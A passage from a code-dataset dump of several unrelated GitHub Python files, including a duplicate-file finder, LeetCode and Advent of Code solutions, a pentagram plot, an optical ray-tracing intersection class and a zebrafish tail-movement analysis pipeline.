2: 'MB',\n 3: 'GB',\n 4: 'TB',\n 5: 'PB',\n }.get(exponent, False)\n\n\nif len(argv) > 1:\n _rootpath = argv[1]\nelse:\n _rootpath = os.getcwd()\n# _rootpath = os.getcwd() + '\\\\sample'\nif not os.path.exists(_rootpath):\n print(\"Provided path does not exists.\")\n exit(1)\nif not os.path.isdir(_rootpath):\n print(\"Provided path not a directory.\")\n exit(1)\n\n_timestart = time()\nprint(\"Processing path %s\" % _rootpath)\n\n_files = {}\n_hashes = {}\nprocess(_rootpath)\n_timeend = time()\n_timetaken = _timeend - _timestart\n\n\nprint(\"Files processed:\")\nfor _filepath in _files.keys():\n _filename, _filehash, _filesize = _files[_filepath]\n print(\" %s: \\n %s\\n %s\\n %d\" % (_filepath, _filename, _filehash, _filesize))\n\n_duplicates = distilhashes(_hashes)\n_totalduplicatespace = 0\nif len(_duplicates) > 0:\n print(\"\\n\\nDuplicates found:\")\n for _duplicate in _duplicates.keys():\n print(\"\\n Duplicate hash: %s\" % _duplicate)\n _filesize = 0\n for _duplicatepath in _duplicates[_duplicate]:\n _filesize = os.path.getsize(_duplicatepath)\n print(\" %s\" % _duplicatepath)\n _duplicatespace = _filesize * (len(_duplicates[_duplicate]) - 1)\n print(\" Space wasted: %s \" % reducetounit(_duplicatespace))\n _totalduplicatespace += _duplicatespace\nelse:\n print(\"\\n\\nNO DUPLICATES FOUND\")\n\nprint(\"\\nRun statistics:\")\nprint(\" Time taken: {0:.2f} seconds\".format(_timetaken))\nprint(\" File count: {:,}\".format(len(_files)))\nprint(\" File list in memory: %s\" % reducetounit(getsizeof(_files)))\nprint(\" Duplicate hashes found: {:,}\".format(len(_duplicates)))\nprint(\" Duplicate hashes list in memory: %s\" % reducetounit(getsizeof(_duplicates)))\nprint(\" Space wasted by duplicates: %s\" % reducetounit(_totalduplicatespace))\n","repo_name":"cloudbear/dupy","sub_path":"du.py","file_name":"du.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3608692179","text":"# Given an array, rotate the array to the right by k steps, where k is non-negative.\n\n# Follow up:\n\n# Try to come up as many solutions as you can, there are at least 3 different ways to solve this problem.\n# Could you do it in-place with O(1) extra space?\n \n\n# Example 1:\n\n# Input: nums = [1,2,3,4,5,6,7], k = 3\n# Output: [5,6,7,1,2,3,4]\n# Explanation:\n# rotate 1 steps to the right: [7,1,2,3,4,5,6]\n# rotate 2 steps to the right: [6,7,1,2,3,4,5]\n# rotate 3 steps to the right: [5,6,7,1,2,3,4]\n\ndef rotate(nums, k):\n new_nums = []\n for i in range(len(nums)-k, len(nums)):\n new_nums.append(nums[i])\n for j in range(len(nums)-k):\n new_nums.append(nums[j])\n for p in range(len(nums)):\n nums[p] = new_nums[p]\n print(nums)\n\nnums = [1,2,3,4,5,6,7]\nk = 2\nrotate(nums, k)\n\n \n\n","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/rotateArray_189.py","file_name":"rotateArray_189.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"236551307","text":"'''Lowest Common Ancestor\nGiven the root and two nodes in a Binary Tree. Find the lowest common ancestor(LCA) of the two nodes.\n\nThe lowest common ancestor is the node with largest depth which is the ancestor of both nodes.\n\n Notice\n\nAssume two nodes are exist in tree.\nExample\nFor the following binary tree:\n\n 4\n / \\\n3 7\n / \\\n 5 6\nLCA(3, 5) = 4\n\nLCA(5, 6) = 7\n\nLCA(6, 7) = 7\n'''\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nclass Solution:\n \"\"\"\n @param {TreeNode} root The root of the binary tree.\n @param {TreeNode} A and {TreeNode} B two nodes\n @return Return the LCA of the two nodes.\n \"\"\"\n def lowestCommonAncestor(self, root, A, B):\n # write your code here\n if not root or root is A or root is B:\n return root\n left = self.lowestCommonAncestor(root.left, A, B)\n right = self.lowestCommonAncestor(root.right, A, B)\n if left and right:\n return root\n if left:\n return left\n if right:\n return right\n return None\n \n","repo_name":"daniellaah/Data-Structure-and-Algorithms","sub_path":"lintcode/code/088_Lowest_Common_Ancestor.py","file_name":"088_Lowest_Common_Ancestor.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10936305887","text":"person = list()\np = list()\nc = heaviest = lightest = hp = lp = 0\n# hp = Heavier Person // lp = Lighter Person\nwhile True:\n p.append(str(input('Insert a name: ')).strip().capitalize())\n p.append(float(input('The weight of the person: ')))\n person.append(p[:])\n p.clear()\n if c == 0:\n heaviest = lightest = person[0][1]\n hp = lp = [person[0][0]]\n else:\n if heaviest < person[c][1]:\n heaviest = person[c][1]\n hp = [person[c][0]]\n elif lightest > person[c][1]:\n lightest = person[c][1]\n lp = [person[c][0]]\n elif heaviest == person[c][1]:\n heaviest = person[c][1]\n hp += [person[c][0]]\n elif lightest == person[c][1]:\n lightest = person[c][1]\n lp += [person[c][0]]\n c += 1\n cont = str(input('Do you want to continue? [y/n]: ')).strip().lower()[0]\n while cont not in 'yn':\n cont = str(input('Do you want to continue? [y/n]: ')).strip().lower()[0]\n if cont == 'n':\n break\nprint(f'The quantity of people registered: {len(person)}')\nprint(f'The Heaviest people: {hp} with {heaviest}kg.')\nprint(f'The lightest people: {lp} with {lightest}kg.')\n","repo_name":"PatrickAMenezes/PyExercises-CeV","sub_path":"Mundo3/PyExercises - CeV - Mundo 3/Exercises (00 - 34)/ex 12.py","file_name":"ex 12.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72041883610","text":"from matplotlib import patches\nfrom math import pi, sqrt\nfrom matplotlib.path import Path\nimport matplotlib.pyplot as plt\n\ndef pentagon(radius, orientation):\n return patches.RegularPolygon((0,0), numVertices=5, radius=radius, orientation=orientation, linestyle='-', fill=None)\n\ndef get_pentagon_vertices(pentagon):\n return [(x[0], x[1]) for x in pentagon.get_verts()]\n\nfig = plt.figure(figsize=(10,10))\nax = plt.gca()\nouter_radius = 10.0\ninner_radius = 2.0/(3.0+sqrt(5.0))*outer_radius + 2\nax.set_aspect(1)\nax.set_xlim(-outer_radius, outer_radius)\nax.set_ylim(-outer_radius, outer_radius)\nouter_pentagon = pentagon(outer_radius, 0)\nouter_points = get_pentagon_vertices(outer_pentagon)\n#ax.add_artist(outer_pentagon)\ninner_pentagon = pentagon(inner_radius, pi/5.0)\ninner_points = get_pentagon_vertices(inner_pentagon)\n#ax.add_artist(inner_pentagon)\nax.set_axis_off()\n\nstar_points = []\nfor idx in range(len(outer_points)):\n star_points.append(outer_points[idx])\n star_points.append(inner_points[idx])\n\ncodes = [Path.MOVETO] + [Path.LINETO]*(len(star_points)-2) + [Path.CLOSEPOLY]\nstar = Path(star_points, codes)\npatch = patches.PathPatch(star, facecolor='orange', lw=2)\nax.add_patch(patch)\nplt.show()\n\n","repo_name":"EvelineV/ppviz","sub_path":"pentagram.py","file_name":"pentagram.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19911555541","text":"\nimport numpy as np\nimport math\nfrom .SurfTools import surface_tools as SUT\n\nclass InterNormalCalc():\n \"\"\"InterNormalCalc.\n \"\"\"\n\n def __init__(self, SurfData, TypTot, PR3D, HS):\n \"\"\"__init__.\n\n Parameters\n ----------\n SurfData :\n SurfData\n TypTot :\n TypTot\n PR3D :\n PR3D\n HS :\n HS\n \"\"\"\n self.HS = HS\n self.SDT = SurfData\n self.n = len(self.SDT)\n self.SuTo = SUT(SurfData)\n self.Pr3D = PR3D\n self.Disable_Inner = 1\n self.ExtraDiameter = 0\n self.AAA = self.Pr3D.AAA\n self.BBB = self.Pr3D.BBB\n self.DDD = self.Pr3D.DDD\n self.EEE = self.Pr3D.EEE\n self.GlassOnSide = self.Pr3D.GlassOnSide\n self.side_number = self.Pr3D.side_number\n self.TypeTotal = self.Pr3D.TypeTotal\n self.TRANS_1A = self.Pr3D.TRANS_1A\n self.TRANS_2A = self.Pr3D.TRANS_2A\n self.Pn = np.asarray([0.0, 0.0, 0.0])\n\n self.P1 = np.asarray([0.0, 0.0, 0.0, 1.0])\n self.P2 = np.asarray([0.0, 0.0, 0.0, 1.0])\n self.P_z1 = 10000000.0\n\n def __SigmaHitTransfSpace(self, PP_start, PP_stop, j):\n \"\"\"__SigmaHitTransfSpace.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n \"\"\"\n\n StopPoint = np.array([PP_stop[0], PP_stop[1], PP_stop[2], 1.0])\n StarPoint = np.array([PP_start[0], PP_start[1], PP_start[2], 1.0])\n\n SurfHit = 1\n P_SurfHit = self.Pr3D.TRANS_1A[j].dot(StopPoint)\n Px1 = P_SurfHit[(0, 0)]\n Py1 = P_SurfHit[(0, 1)]\n Pz1 = P_SurfHit[(0, 2)]\n\n P_start = self.Pr3D.TRANS_1A[j].dot(StarPoint)\n P_x1 = P_start[(0, 0)]\n P_y1 = P_start[(0, 1)]\n P_z1 = P_start[(0, 2)]\n\n P12 = [(Px1 - P_x1), (Py1 - P_y1), (Pz1 - P_z1)]\n [L, M, N] = (P12 / np.linalg.norm(P12))\n\n Px1 = (((L / N) * (- P_z1)) + P_x1)\n Py1 = (((M / N) * (- P_z1)) + P_y1)\n\n Pz1 = 0\n SurfHit = 1\n\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n if (len(np.shape(P_x1)) != 0):\n L = L[0]\n M = M[0]\n N = N[0]\n P_x1 = P_x1[0]\n P_y1 = P_y1[0]\n P_z1 = P_z1[0]\n Px1 = Px1[0]\n Py1 = Py1[0]\n Pz1 = Pz1[0]\n P_x2 = P_x2[0]\n P_y2 = P_y2[0]\n P_z2 = P_z2[0]\n SurfHit = SurfHit[0]\n\n if (self.SDT[j].Thin_Lens == 0):\n self.vj = j\n\n ASD=np.sqrt(((Px1-self.SDT[j].SubAperture[2])**2) + ((Py1-self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)\n DiamInf = ((self.SDT[j].InDiameter * self.SDT[j].SubAperture[0]) * self.Disable_Inner)\n DiamSup = ((self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) + (10000.0 * self.ExtraDiameter))\n\n\n if ((D0 > DiamSup) or (D0 < DiamInf)):\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n else:\n (P_x2, P_y2, P_z2) = self.HS.SolveHit(Px1, Py1, Pz1, L, M, N, j)\n if (not math.isnan(P_z2)):\n P_x2 = self.HS.vevaX\n P_y2 = self.HS.vevaY\n\n ASD=np.sqrt(((Px1-self.SDT[j].SubAperture[2])**2) + ((Py1-self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)\n\n DiamInf = ((self.SDT[j].InDiameter * self.SDT[j].SubAperture[0]) * self.Disable_Inner)\n DiamSup = ((self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) + (10000.0 * self.ExtraDiameter))\n if ((D0 > DiamSup) or (D0 < DiamInf)):\n SurfHit = 0\n else:\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n else:\n ASD=np.sqrt(((Px1 - self.SDT[j].SubAperture[2])**2) + ((Py1 - self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)*0.999999\n\n if ((D0 > self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) or (D0 < self.SDT[j].InDiameter * self.SDT[j].SubAperture[0] )):\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n else:\n P_x2 = ((L / N) * self.SDT[j].Thin_Lens)\n P_y2 = ((M / N) * self.SDT[j].Thin_Lens)\n P_z2 = self.SDT[j].Thin_Lens\n\n return (SurfHit, P_x2, P_y2, P_z2, Px1, Py1, Pz1, L, M, N)\n\n def __SigmaHitTransfSpaceFast(self, PP_start, PP_stop, j):\n\n StopPoint = np.array([PP_stop[0], PP_stop[1], PP_stop[2], 1.0])\n StarPoint = np.array([PP_start[0], PP_start[1], PP_start[2], 1.0])\n\n SurfHit = 1\n P_SurfHit = self.Pr3D.TRANS_1A[j].dot(StopPoint)\n Px1 = P_SurfHit[(0, 0)]\n Py1 = P_SurfHit[(0, 1)]\n Pz1 = P_SurfHit[(0, 2)]\n\n P_start = self.Pr3D.TRANS_1A[j].dot(StarPoint)\n P_x1 = P_start[(0, 0)]\n P_y1 = P_start[(0, 1)]\n P_z1 = P_start[(0, 2)]\n\n P12 = [(Px1 - P_x1), (Py1 - P_y1), (Pz1 - P_z1)]\n [L, M, N] = (P12 / np.linalg.norm(P12))\n\n Px1 = (((L / N) * (- P_z1)) + P_x1)\n Py1 = (((M / N) * (- P_z1)) + P_y1)\n\n Pz1 = 0\n SurfHit = 1\n\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n\n (P_x2, P_y2, P_z2) = self.HS.SolveHit(Px1, Py1, Pz1, L, M, N, j)\n if (not math.isnan(P_z2)):\n P_x2 = self.HS.vevaX\n P_y2 = self.HS.vevaY\n\n else:\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n return (SurfHit, P_x2, P_y2, P_z2, Px1, Py1, Pz1)\n\n def __ParaxCalcObjOut2OrigSpace(self, Px2, Py2, Pz2, Px1, Py1, Pz1, j):\n \"\"\"__ParaxCalcObjOut2OrigSpace.\n\n Parameters\n ----------\n Px2 :\n Px2\n Py2 :\n Py2\n Pz2 :\n Pz2\n Px1 :\n Px1\n Py1 :\n Py1\n Pz1 :\n Pz1\n j :\n j\n \"\"\"\n P1 = [Px1, Py1, Pz1, 1]\n P2 = [Px2, Py2, Pz2, 1]\n NP1 = self.TRANS_2A[j].dot(P1)\n NP2 = self.TRANS_2A[j].dot(P2)\n Pn = np.asarray([(- (NP1[(0, 0)] - NP2[(0, 0)])), (- (NP1[(0, 1)] - NP2[(0, 1)])), (- (NP1[(0, 2)] - NP2[(0, 2)]))])\n norm = (Pn / np.linalg.norm(Pn))\n PTO_exit = [NP1[(0, 0)], NP1[(0, 1)], NP1[(0, 2)]]\n PTO_exit_Object_Space = [Px1, Py1, Pz1]\n return (norm, PTO_exit, PTO_exit_Object_Space)\n\n def __SigmaOutOrigSpace(self, P_x2, P_y2, P_z2, j):\n \"\"\"__SigmaOutOrigSpace.\n\n Parameters\n ----------\n P_x2 :\n P_x2\n P_y2 :\n P_y2\n P_z2 :\n P_z2\n j :\n j\n \"\"\"\n (New_L, New_M, New_N) = self.HS.SurfDer(P_x2, P_y2, P_z2)\n\n Pz1z2 = (self.P_z1 - P_z2)\n\n P_x1 = ((Pz1z2 * (New_L / New_N)) + P_x2)\n P_y1 = ((Pz1z2 * (New_M / New_N)) + P_y2)\n\n\n self.P1[0], self.P1[1], self.P1[2] = P_x1, P_y1, self.P_z1\n self.P2[0], self.P2[1], self.P2[2] = P_x2, P_y2, P_z2\n\n NP1 = self.TRANS_2A[j].dot(self.P1)\n NP2 = self.TRANS_2A[j].dot(self.P2)\n\n\n self.Pn[0] = - (NP1[(0, 0)] - NP2[(0, 0)])\n self.Pn[1] = - (NP1[(0, 1)] - NP2[(0, 1)])\n self.Pn[2] = - (NP1[(0, 2)] - NP2[(0, 2)])\n\n\n LNOR=np.sqrt((self.Pn[0]**2.)+(self.Pn[1]**2.)+(self.Pn[2]**2.))\n\n norm = (self.Pn / LNOR)\n\n PTO_exit = [NP2[(0, 0)], NP2[(0, 1)], NP2[(0, 2)]]\n PTO_exit_Object_Space = [P_x2, P_y2, P_z2]\n\n\n return (norm, PTO_exit, PTO_exit_Object_Space)\n\n def __HitOnMask(self, PP_start, PP_stop, j):\n \"\"\"__HitOnMask.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n \"\"\"\n SurfHit = 1\n HITS_CONT = []\n if (self.SDT[j].Mask_Type != 0):\n OBJECT = self.DDD[j]\n for obj in OBJECT:\n (inter_mask, ind_mask) = obj.ray_trace(PP_start, PP_stop)\n Hit_MASK = np.shape(inter_mask)[0]\n HITS_CONT.append(Hit_MASK)\n HITS_CONT = np.asarray(HITS_CONT)\n if np.any((HITS_CONT == 1)):\n SurfHit_MASK = 1\n else:\n SurfHit_MASK = 0\n if (self.SDT[j].Mask_Type == 1):\n if (SurfHit_MASK == 1):\n SurfHit = 1\n else:\n SurfHit = 0\n if (self.SDT[j].Mask_Type == 2):\n if (SurfHit_MASK == 1):\n SurfHit = 0\n else:\n SurfHit = 1\n return SurfHit\n\n def __GrooveDirectionVector(self, j):\n \"\"\"__GrooveDirectionVector.\n\n Parameters\n ----------\n j :\n j\n \"\"\"\n self.P1[0], self.P1[1], self.P1[2] = 0, 0, 0\n self.P2[0], self.P2[1], self.P2[2] = -np.cos(np.deg2rad(self.SDT[j].Grating_Angle)), -np.sin(np.deg2rad(self.SDT[j].Grating_Angle)),0\n\n NP1 = self.TRANS_2A[j].dot(self.P1)\n NP2 = self.TRANS_2A[j].dot(self.P2)\n\n self.Pn[0] = - (NP1[(0, 0)] - NP2[(0, 0)])\n self.Pn[1] = - (NP1[(0, 1)] - NP2[(0, 1)])\n self.Pn[2] = - (NP1[(0, 2)] - NP2[(0, 2)])\n\n LNOR=np.sqrt((self.Pn[0]**2.)+(self.Pn[1]**2.)+(self.Pn[2]**2.))\n\n Pg_v = (self.Pn / LNOR)\n return Pg_v\n\n def InterNormal(self, PP_start, PP_stop, j, jj):\n \"\"\"InterNormal.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n jj :\n jj\n \"\"\"\n PTO_exit = [0, 0, 0]\n PTO_exit_Object_Space = [0, 0, 0]\n LMN_exit_Object_Space = [0, 0, 1]\n norm = [0, 0, 1]\n SurfHit = 1\n\n if (self.SDT[j].Diff_Ord == 0):\n Pgn = [0, 1, 0]\n\n else:\n Pgn = self.__GrooveDirectionVector(j)\n\n if (self.TypeTotal[jj] == 0):\n SurfHit = 1\n SurfHit = self.__HitOnMask(PP_start, PP_stop, j)\n\n if (SurfHit != 0):\n\n (SurfHit, Px2, Py2, Pz2, Px1, Py1, Pz1, L, M, N) = self.__SigmaHitTransfSpace(PP_start, PP_stop, j)\n LMN_exit_Object_Space = [L, M, N]\n\n if (self.SDT[j].Thin_Lens == 0):\n (norm, PTO_exit, PTO_exit_Object_Space) = self.__SigmaOutOrigSpace(Px2, Py2, Pz2, j)\n\n else:\n (norm, PTO_exit, PTO_exit_Object_Space) = self.__ParaxCalcObjOut2OrigSpace(Px2, Py2, Pz2, Px1, Py1, Pz1, j)\n else:\n (SurfHit, norm, PTO_exit, Pgn) = self.__InterNormalSolidObject(jj, PP_start, PP_stop)\n return (SurfHit, np.asarray(norm), np.asarray(PTO_exit), np.asarray(Pgn), np.asarray(PTO_exit_Object_Space), np.asarray(LMN_exit_Object_Space), j)\n\n def __InterNormalSolidObject(self, jj, PP_start, PP_stop):\n \"\"\"__InterNormalSolidObject.\n\n Parameters\n ----------\n jj :\n jj\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n \"\"\"\n Pgn = np.asarray([0, 1, 0])\n PTO_exit = [0, 0, 0]\n norm = [0, 0, 1]\n (inter, ind) = self.EEE[jj].ray_trace(PP_start, PP_stop)\n SurfHit = np.shape(inter)[0]\n if (SurfHit != 0):\n s = 0\n h = []\n for f in ind:\n PD = (np.asarray(inter[s]) - np.asarray(PP_start))\n distance = np.linalg.norm(PD)\n if (np.abs(distance) < 0.05):\n distance = 99999999999999.9\n h.append(distance)\n s = (s + 1)\n index = np.argmin(np.asarray(h))\n PTO_exit = inter[index]\n NOR = self.EEE[jj].cell_normals\n norm = NOR[ind[index]]\n Pgn = np.asarray([0, 0, 1])\n return (SurfHit, norm, PTO_exit, Pgn)\n","repo_name":"Garchupiter/Kraken-Optical-Simulator","sub_path":"KrakenOS/InterNormalCalc.py","file_name":"InterNormalCalc.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"42945546802","text":"\"\"\"Day 21: RPG Simulator 20XX\n\nhttps://adventofcode.com/2015/day/21\n\n\"\"\"\nimport re\nfrom dataclasses import dataclass\nfrom itertools import combinations, product\n\n# hit points - always reduced at least 1\n# damage = attacker's damage score - defender's armour score\n# user 0 damage , 0 armour, 100 hit points\n\nSHOP = \"\"\"\nWeapons: Cost Damage Armor\nDagger 8 4 0\nShortsword 10 5 0\nWarhammer 25 6 0\nLongsword 40 7 0\nGreataxe 74 8 0\n\nArmor: Cost Damage Armor\nLeather 13 0 1\nChainmail 31 0 2\nSplintmail 53 0 3\nBandedmail 75 0 4\nPlatemail 102 0 5\n\nRings: Cost Damage Armor\nDamage +1 25 1 0\nDamage +2 50 2 0\nDamage +3 100 3 0\nDefense +1 20 0 1\nDefense +2 40 0 2\nDefense +3 80 0 3\n\"\"\"\n\n\nBOSS = re.compile(r'Hit Points: (\\d+)\\nDamage: (\\d+)\\nArmor: (\\d+)')\nITEM = re.compile(r'\\w+\\s?\\+?\\d?\\s+(\\d+)\\s+(\\d+)\\s+(\\d+)')\n\n\nclass Character:\n\n def __init__(self, hp, damage, armor):\n self.hp = hp\n self.damage = damage\n self.armor = armor\n\n def __repr__(self):\n return f' 0 and opponent.hp > 0:\n opponent.hp -= max(self.damage - opponent.armor, 1)\n self.hp -= max(opponent.damage - self.armor, 1)\n return opponent.hp <= 0\n\n\n@dataclass\nclass Item:\n cost: int\n damage: int = 0\n armor: int = 0\n\n def __add__(self, other):\n return Item(\n self.cost + other.cost,\n self.damage + other.damage,\n self.armor + other.armor,\n )\n\n\ndef parse_character(input_str):\n hp, damage, armor = map(int, list(BOSS.findall(input_str)[0]))\n return Character(hp, damage, armor)\n\n\ndef _parse_item_list_from_string(item_list_str):\n return [\n Item(int(cost), int(damage), int(armor))\n for cost, damage, armor in ITEM.findall(item_list_str)\n ]\n\n\ndef parse_shop(input_str):\n for items_str in input_str.strip().split('\\n\\n'):\n yield _parse_item_list_from_string(items_str)\n\n\ndef item_combinations(weapons, armors, rings):\n ring_pairs = combinations(rings, 2)\n for w, a, rp in product(weapons, armors, ring_pairs):\n yield w + a + rp[0] + rp[1]\n\n\ndef go_shopping(weapons, armors, rings):\n empty_item = Item(0, 0, 0)\n armors.append(empty_item)\n rings.extend([empty_item, empty_item])\n return item_combinations(weapons, armors, rings)\n\n\ndef solve(data, shop, price_function=min):\n return price_function([\n item.cost\n for item in go_shopping(*parse_shop(shop))\n if Character(\n 100, item.damage, item.armor\n ).fight(parse_character(data)) is (price_function == min)\n ])\n\n\nif __name__ == '__main__':\n input_data = open('input_data.txt').read()\n result = solve(input_data, SHOP, min)\n print(f'Example1: {result}')\n\n result = solve(input_data, SHOP, max)\n print(f'Example2: {result}')\n","repo_name":"lenarother/advent-of-code","sub_path":"adventofcode_2015/day_21/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40240041645","text":"import numpy as np\nimport pandas as pd\nfrom dataclasses import dataclass,field\nfrom functools import partial\n\nfrom megabouts.pipeline.cfg import ConfigTrajPreprocess,ConfigTailPreprocess,ConfigSparseCoding,ConfigTailSegmentation,ConfigClassification\n\nfrom megabouts.tracking_data.dataset import Dataset_TailTracking\nfrom megabouts.segmentation.segment import Segment\nfrom megabouts.classification.template_bouts import Knn_Training_Dataset\n\nfrom megabouts.preprocessing.preprocessing import preprocess_tail\nfrom megabouts.segmentation.segment import extract_bouts\n\nfrom megabouts.sparse_coding.sparse_coding import compute_sparse_code,SparseCode\nfrom megabouts.segmentation.segment import Segment,segment_from_code,segment_from_code_w_fine_alignement\nfrom megabouts.classification.classify import bouts_classifier,Classification\n\nfrom megabouts.utils.utils_bouts import compute_bout_cat_ts\n\n\n@dataclass\nclass PipelineFreeTailOnly_Result:\n tracking_data: Dataset_TailTracking\n tracking_data_clean: Dataset_TailTracking\n baseline: np.ndarray=field(init=True,repr=False)\n sparse_code: SparseCode\n segments: Segment\n segments_original: Segment\n tail_array: np.ndarray=field(init=True,repr=False)\n classification: Classification\n bout_category_ts: np.ndarray=field(init=True,repr=False)\n bout_category_ts_signed: np.ndarray=field(init=True,repr=False)\n \n\n@dataclass(repr=False)\nclass PipelineFreeTailOnly():\n cfg_tail_preprocess : ConfigTailPreprocess = field(init=True)\n cfg_sparse_coding : ConfigSparseCoding = field(init=True)\n cfg_segment : ConfigTailSegmentation = field(init=True)\n cfg_classify : ConfigClassification = field(init=True)\n knn_training_dataset_augmented: Knn_Training_Dataset = field(init=False)\n load_training: bool = True\n res: PipelineFreeTailOnly_Result = field(init=False)\n\n \n def __post_init__(self):\n assert self.cfg_tail_preprocess.fps==self.cfg_segment.fps==self.cfg_classify.fps, \\\n f\"fps should be the same in both config\"\n if self.load_training:\n self.load_training_template()\n \n def load_training_template(self):\n self.knn_training_dataset_augmented = Knn_Training_Dataset(fps = self.cfg_tail_preprocess.fps,\n augmentation_delays = np.unique(np.arange(self.cfg_classify.augment_min_delay,self.cfg_classify.augment_max_delay,self.cfg_classify.augment_step_delay).tolist()+[0]),\n bouts_dict = self.cfg_classify.bouts_dict,\n bout_duration = self.cfg_classify.bout_duration,\n peak_loc = self.cfg_classify.margin_before_peak)\n def preprocess_tail(self,tail_angle):\n return preprocess_tail(tail_angle=tail_angle,\n limit_na=self.cfg_tail_preprocess.limit_na,\n num_pcs=self.cfg_tail_preprocess.num_pcs,\n baseline_method = self.cfg_tail_preprocess.baseline_method,\n baseline_params = self.cfg_tail_preprocess.baseline_params)\n \n def compute_sparse_code(self,tail_angle):\n return compute_sparse_code(tail_angle=tail_angle,\n Dict=self.cfg_sparse_coding.Dict,\n Wg=[],\n lmbda=self.cfg_sparse_coding.lmbda,\n gamma=self.cfg_sparse_coding.gamma,\n mu=self.cfg_sparse_coding.mu,\n Whn=self.cfg_sparse_coding.window_inhib)\n \n def find_segment(self,z,tail_angle1d):\n return segment_from_code_w_fine_alignement(z=z,tail_angle1d=tail_angle1d,\n min_code_height=self.cfg_segment.min_code_height,\n min_spike_dist=self.cfg_segment.min_spike_dist,\n bout_duration=self.cfg_segment.bout_duration,\n margin_before_peak=self.cfg_segment.margin_before_peak,\n dict_peak=self.cfg_sparse_coding.dict_peak)\n \n def classify(self,X):\n return bouts_classifier(X,\n kNN_training_dataset=self.knn_training_dataset_augmented,\n weight=self.cfg_classify.feature_weight,\n n_neighbors=self.cfg_classify.N_kNN,\n tracking_method='tail')\n \n def run(self,tail_angle):\n \n tracking_data = Dataset_TailTracking(fps=self.cfg_tail_preprocess.fps,\n tail_angle=tail_angle)\n \n tail_angle_clean,baseline = self.preprocess_tail(tail_angle=tracking_data.tail_angle)\n N_c = self.cfg_tail_preprocess.tail_segment_cutoff\n tail_angle_detrend = tail_angle_clean[:,:N_c]-baseline[:,:N_c]\n \n tracking_data_clean = Dataset_TailTracking(fps=self.cfg_tail_preprocess.fps,\n tail_angle=tail_angle_clean-baseline)\n # Compute Sparse Code:\n sparse_code = self.compute_sparse_code(tail_angle_detrend)\n \n # Compute Segments:\n segments,segment_original,is_aligned = self.find_segment(z=sparse_code.z,tail_angle1d=tail_angle_detrend[:,N_c-1])\n \n tail_array = extract_bouts(tail_angle=tail_angle_detrend,\n segment = segments)\n \n # Classify:\n classification_res = self.classify(tail_array)\n \n # Refine segmentation:\n onset_shift = classification_res.onset_shift\n onset_refined = [on_ + int(onset_shift[i]) for i,on_ in enumerate(segments.onset)]\n offset_refined = [off_ + int(onset_shift[i]) for i,off_ in enumerate(segments.offset)]\n \n segments_refined = Segment(onset=onset_refined,offset=offset_refined,bout_duration=self.cfg_segment.bout_duration)\n\n tail_array_refined = extract_bouts(tail_angle=tail_angle_detrend,\n segment = segments_refined)\n \n # Compute Time series of categories:\n bout_category = classification_res.bout_category \n bout_category_ts,bout_category_ts_signed = compute_bout_cat_ts(segments_refined.onset,segments_refined.offset,bout_category,tracking_data.n_frames)\n \n # Compute result:\n res = PipelineFreeTailOnly_Result(tracking_data=tracking_data,\n tracking_data_clean = tracking_data_clean,\n baseline = baseline,\n sparse_code = sparse_code,\n segments = segments_refined,\n segments_original = segments,\n tail_array = tail_array_refined,\n classification = classification_res,\n bout_category_ts = bout_category_ts,\n bout_category_ts_signed = bout_category_ts_signed)\n\n self.res = res\n \n return self.res\n \n ","repo_name":"orger-lab/megabouts","sub_path":"megabouts/pipeline/full_tracking_tail_only.py","file_name":"full_tracking_tail_only.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27873156519","text":"import getpass\nimport sys\nimport cv2\nimport matplotlib.pyplot as plt\n''' \n\n'b' 98 backward 1 frame\n'd' 100 backward 'frame_jump' frames\n'f' 102 forward 1 frame\n's' 115 save\n'u' 117 forward 'frame_jump' frames\n'''\nscaling_factor = 0.7\nvid_name = \"dog.mp4\" # l.mkv \"m.mp4\"\nframe_jump = 100\nframe_no = 65\nframe_name = 'frame_%d.jpg'\nBASE_FOLDER = 'C:/Users/' + getpass.getuser() +'/Videos/Captures/'\n\n\ndef readImagePath():\n input_file = BASE_FOLDER + vid_name\n return input_file\n\n\ninput_video_file = readImagePath()\n\nprint(input_video_file)\n\n\nvidcap = 